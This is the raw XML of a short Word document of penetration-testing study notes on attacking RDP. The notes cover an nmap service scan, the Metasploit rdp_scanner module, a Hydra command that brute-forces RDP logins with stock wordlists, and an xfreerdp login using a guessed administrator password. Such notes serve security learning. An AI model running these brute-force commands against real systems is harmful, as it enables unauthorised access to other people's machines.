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7DD8" w14:textId="0124BD93" w:rsidR="00853ABF" w:rsidRDefault="00696B88">
      <w:r>
        <w:t>Exploiting RDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28842C7F" w14:textId="6AB07CEF" w:rsidR="00696B88" w:rsidRDefault="00696B88">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="008E3A34">
        <w:t>3389,</w:t>
      </w:r>
      <w:r w:rsidR="00816C17">
        <w:t xml:space="preserve"> other port can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574E114" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="4EA26A94" w14:textId="4259EB03" w:rsidR="008E3A34" w:rsidRPr="008E3A34" w:rsidRDefault="008E3A34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RDP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Brute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A07BD8" w14:textId="2608D036" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746CD5E" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="6CA2E5EC" w14:textId="58F94E99" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t xml:space="preserve">Nmap -s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">V  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6589EC6B" w14:textId="208D554E" w:rsidR="008E3A34" w:rsidRPr="008E3A34" w:rsidRDefault="008E3A34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C32D9D" w14:textId="2A75A7D9" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t xml:space="preserve">If you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port open and it is running on it can be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run on other port to confirm that firstly is to connect to the target on the port on which you have chance that it is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the other is the Metasploit framework module </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“ RDP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SCANNER”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA45C3" w14:textId="5AAF38E8" w:rsidR="008E3A34" w:rsidRDefault="0072495E">
      <w:r>
        <w:t xml:space="preserve">Be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>carefull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> about the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> speed as it may crash the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65F626D6" w14:textId="14D50B79" w:rsidR="0072495E" w:rsidRDefault="0072495E">
      <w:r>
        <w:t xml:space="preserve">To limit it use </w:t>
      </w:r>
      <w:r w:rsidRPr="0072495E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hyra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to limit to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>amount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527675D0" w14:textId="3D9D67E7" w:rsidR="00CB5DBF" w:rsidRDefault="00CB5DBF">
      <w:r>
        <w:t>Specify the port if default is not used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B16FA" w14:textId="77777777" w:rsidR="00CB5DBF" w:rsidRDefault="00CB5DBF"/>
    <w:p w14:paraId="49461288" w14:textId="77777777" w:rsidR="00CB5DBF" w:rsidRDefault="00CB5DBF"/>
    <w:p w14:paraId="3C6E6C5E" w14:textId="5A33E110" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="798B833B" w14:textId="59AF3117" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdp_scanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FDD2AD5" w14:textId="24669D8A" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671F9D4" w14:textId="63E19168" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C189EF" w14:textId="01C34116" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561984E" w14:textId="3E4AA890" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368D280" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="66C7B3F7" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="16E2EE75" w14:textId="433FBCDB" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get credential of RDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D0465" w14:textId="38340D26" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ftp,ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,smb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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73687AB2" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRPr="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="1C2B90A2" w14:textId="4C25D6AE" w:rsidR="008E3A34" w:rsidRDefault="008E3A34">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t xml:space="preserve">Metasploit-framework/data/wordlists/common_users.txt -P </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CF0404">
        <w:t>/usr/share/Metasploit-framework/data/wordlists/</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t>passwords</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="00CF0404">
        <w:t xml:space="preserve">  rdp://target_ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CF0404">
        <w:t xml:space="preserve">  -s port number of RDP</w:t>
      </w:r>
      <w:r w:rsidR="0072495E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD85DA" w14:textId="77777777" w:rsidR="00FC2FE5" w:rsidRDefault="00FC2FE5"/>
    <w:p w14:paraId="236FB3C0" w14:textId="76AD0674" w:rsidR="0072495E" w:rsidRDefault="0072495E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>u:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p:qwertyuiop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>v:target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00CB5DBF">
        <w:t>:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41A85B73" w14:textId="77777777" w:rsidR="00CB5DBF" w:rsidRDefault="00CB5DBF"/>
    <w:p w14:paraId="4884D125" w14:textId="77777777" w:rsidR="00FC2FE5" w:rsidRDefault="00FC2FE5"/>
    <w:p w14:paraId="3521D8DA" w14:textId="0F810322" w:rsidR="008D4169" w:rsidRDefault="008D4169">
      <w:r>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35CAEF" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> → the whole project (the “engine” for Remote Desktop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B711FC" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> → the command you run in Linux to connect to a Windows computer (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>uses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A39BE3F" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> → same thing but for Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14445E97" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4169">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other tools</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> → extra stuff (clipboard sharing, file sharing, sound, proxy, etc.) built from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED8952" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:r w:rsidRPr="008D4169">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> So:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9C6B0" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> = the toolbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0814BF" w14:textId="77777777" w:rsidR="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t xml:space="preserve"> = the hammer you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>actually use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D4169">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E397A" w14:textId="1A8F9327" w:rsidR="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169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RDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = the protocol (the idea, like “language” computers use).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2FBE0F" w14:textId="0096217E" w:rsidR="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169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FreeRDP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = a free program that speaks that language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59431E45" w14:textId="77777777" w:rsidR="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688D307F" w14:textId="77777777" w:rsidR="008D4169" w:rsidRPr="008D4169" w:rsidRDefault="008D4169" w:rsidP="008D4169"/>
    <w:p w14:paraId="3F8976B1" w14:textId="77777777" w:rsidR="008D4169" w:rsidRDefault="008D4169"/>
    <w:p w14:paraId="2598EC46" w14:textId="77777777" w:rsidR="00FC2FE5" w:rsidRDefault="00FC2FE5"/>
    <w:p w14:paraId="5BA0EAFE" w14:textId="77777777" w:rsidR="0072495E" w:rsidRDefault="0072495E"/>
    <w:p w14:paraId="2394C357" w14:textId="77777777" w:rsidR="0072495E" w:rsidRDefault="0072495E"/>
    <w:p w14:paraId="18715194" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="2DD9CFA1" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="6193CF8F" w14:textId="77777777" w:rsidR="008E3A34" w:rsidRDefault="008E3A34"/>
    <w:p w14:paraId="52320E31" w14:textId="77777777" w:rsidR="00696B88" w:rsidRDefault="00696B88"/>
    <w:sectPr w:rsidR="0069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2944"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA8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97BDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D4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956956">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="174714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71"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00696B88"/>
    <w:rsid w:val="0072495E"/>
    <w:rsid w:val="00816C17"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00863E71"/>
    <w:rsid w:val="008D4169"/>
    <w:rsid w:val="008E3A34"/>
    <w:rsid w:val="00A56305"/>
    <w:rsid w:val="00CB5DBF"/>
    <w:rsid w:val="00CF0404"/>
    <w:rsid w:val="00F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ADA4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C4AC3C5-D06C-42F1-BCAB-21B516A2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4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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T17:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>